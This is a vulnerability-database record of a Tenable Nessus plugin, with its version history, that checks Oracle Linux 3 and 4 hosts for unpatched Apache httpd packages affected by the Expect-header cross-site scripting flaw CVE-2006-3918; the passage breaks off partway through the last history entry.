{"id": "ORACLELINUX_ELSA-2006-0619.NASL", "bulletinFamily": "scanner", "title": "Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)", "description": "From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "published": "2013-07-12T00:00:00", "modified": "2018-07-18T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=67402", "reporter": "Tenable", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html", "https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html"], "cvelist": ["CVE-2006-3918"], "type": "nessus", "lastseen": "2018-09-02T00:10:40", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"], "cvelist": ["CVE-2006-3918"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 3, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "f5e25aeeaa04c456a0365864c02f4ffda63e1459760a27f966627c8ca92f7c3f", "hashmap": [{"hash": "bb8c22eff55de3cc61125b8bb6e73788", "key": "cpe"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "7152f4f2dfa4e1cc7db86648913b8ac9", "key": "pluginID"}, {"hash": "6720baafdcfc97a14557b27983316737", "key": "description"}, {"hash": "85ca20f7ea83b0470da973dc873f713f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7681b31382abbd9bd923620bc259cb93", "key": "title"}, {"hash": "2e3c438f66403fd816adabf5a1b82b29", "key": "modified"}, {"hash": "fb9158df54dcee8bea6dba7dab140474", "key": "sourceData"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "d7452313326ed340725f5a5dacde8c59", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "42678e88b0e19817ad2f8430db546cbe", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67402", "id": "ORACLELINUX_ELSA-2006-0619.NASL", "lastseen": "2018-07-21T08:38:41", "modified": "2018-07-18T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67402", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html", "https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# Oracle Linux Security Advisory ELSA-2006-0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67402);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/07/18 17:43:55\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "title": "Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)", "type": "nessus", "viewCount": 1}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-07-21T08:38:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["p-cpe:/a:oracle:linux:httpd-devel", "p-cpe:/a:oracle:linux:httpd", "p-cpe:/a:oracle:linux:httpd-suexec", "p-cpe:/a:oracle:linux:mod_ssl", "cpe:/o:oracle:linux:3", "p-cpe:/a:oracle:linux:httpd-manual", "cpe:/o:oracle:linux:4"], "cvelist": ["CVE-2006-3918"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 2, "enchantments": {"score": {"value": 4.3, "vector": "NONE"}}, "hash": "b1a99ce7ff61dee07fc1236e52d5b0d4e7cc34fed5695336bf36f9f1211df11e", "hashmap": [{"hash": "3ef6f8b70c5920c1358fb99ec6943223", "key": "sourceData"}, {"hash": "bb8c22eff55de3cc61125b8bb6e73788", "key": "cpe"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "7152f4f2dfa4e1cc7db86648913b8ac9", "key": "pluginID"}, {"hash": "6720baafdcfc97a14557b27983316737", "key": "description"}, {"hash": "85ca20f7ea83b0470da973dc873f713f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7681b31382abbd9bd923620bc259cb93", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "d7452313326ed340725f5a5dacde8c59", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "be3ffe9319ca8bf2f8c339435e78948f", "key": "modified"}, {"hash": "42678e88b0e19817ad2f8430db546cbe", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67402", "id": "ORACLELINUX_ELSA-2006-0619.NASL", "lastseen": "2017-10-29T13:46:00", "modified": "2015-12-01T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.3", "pluginID": "67402", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html", "https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# Oracle Linux Security Advisory ELSA-2006-0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67402);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/12/01 16:16:26 $\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_osvdb_id(27488);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-manual\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-suexec\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:mod_ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 3 / 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"i386\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\nif (rpm_check(release:\"EL3\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.46-61.ent.0.1\")) flag++;\n\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-devel-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-manual-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"httpd-suexec-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\nif (rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"mod_ssl-2.0.52-28.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"httpd / httpd-devel / httpd-manual / httpd-suexec / mod_ssl\");\n}\n", "title": "Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)", "type": "nessus", "viewCount": 1}, "differentElements": ["modified", "sourceData"], "edition": 2, "lastseen": "2017-10-29T13:46:00"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2006-3918"], "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "description": "From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve bugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the Red Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the server was returned to the user in an unescaped error message. This could allow an attacker to perform a cross-site scripting attack if a victim was tricked into connecting to a site and sending a carefully crafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect header by a third-party attacker, it was recently discovered that certain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page with a malicious Flash applet, a cross-site scripting attack against the server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue in the handling of malformed Expect headers, the page produced by the cross-site scripting attack will only be returned after a timeout expires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain a backported patch to correct these issues.", "edition": 1, "enchantments": {}, "hash": "bd8da059c0524134f22e7b41e4b1c1c704acd384694be68839a2bdaae8e8f372", "hashmap": [{"hash": "3ef6f8b70c5920c1358fb99ec6943223", "key": "sourceData"}, {"hash": "6e9bdd2021503689a2ad9254c9cdf2b3", "key": "cvss"}, {"hash": "7152f4f2dfa4e1cc7db86648913b8ac9", "key": "pluginID"}, {"hash": "6720baafdcfc97a14557b27983316737", "key": "description"}, {"hash": "85ca20f7ea83b0470da973dc873f713f", "key": "href"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "7681b31382abbd9bd923620bc259cb93", "key": "title"}, {"hash": "e31ed89ab0cbb68ce2c40f17ec1e5483", "key": "naslFamily"}, {"hash": "d7452313326ed340725f5a5dacde8c59", "key": "cvelist"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0db193a0effe2d65dffecdb5e4d9c241", "key": "published"}, {"hash": "be3ffe9319ca8bf2f8c339435e78948f", "key": "modified"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}, {"hash": "42678e88b0e19817ad2f8430db546cbe", "key": "references"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=67402", "id": "ORACLELINUX_ELSA-2006-0619.NASL", "lastseen": "2016-09-26T17:26:45", "modified": "2015-12-01T00:00:00", "naslFamily": "Oracle Linux Local Security Checks", "objectVersion": "1.2", "pluginID": "67402", "published": "2013-07-12T00:00:00", "references": ["https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html", "https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2006:0619 and \n# Oracle Linux Security Advisory ELSA-2006-0619 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67402);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/12/01 16:16:26 $\");\n\n script_cve_id(\"CVE-2006-3918\");\n script_bugtraq_id(19661);\n script_osvdb_id(27488);\n script_xref(name:\"RHSA\", value:\"2006:0619\");\n\n script_name(english:\"Oracle Linux 3 / 4 : httpd (ELSA-2006-0619)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2006:0619 :\n\nUpdated Apache httpd packages that correct security issues and resolve\nbugs are now available for Red Hat Enterprise Linux 3 and 4.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nThe Apache HTTP Server is a popular Web server available for free.\n\nA bug was found in Apache where an invalid Expect header sent to the\nserver was returned to the user in an unescaped error message. This\ncould allow an attacker to perform a cross-site scripting attack if a\nvictim was tricked into connecting to a site and sending a carefully\ncrafted Expect header. (CVE-2006-3918)\n\nWhile a web browser cannot be forced to send an arbitrary Expect\nheader by a third-party attacker, it was recently discovered that\ncertain versions of the Flash plugin can manipulate request headers.\nIf users running such versions can be persuaded to load a web page\nwith a malicious Flash applet, a cross-site scripting attack against\nthe server may be possible.\n\nOn Red Hat Enterprise Linux 3 and 4 systems, due to an unrelated issue\nin the handling of malformed Expect headers, the page produced by the\ncross-site scripting attack will only be returned after a timeout\nexpires (2-5 minutes by default) if not first canceled by the user.\n\nUsers of httpd should update to these erratum packages, which contain\na backported patch to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2006-November/000001.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2007-March/000078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected httpd packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:httpd-devel\");\n script_set_attribute(attribute:\"cpe\", 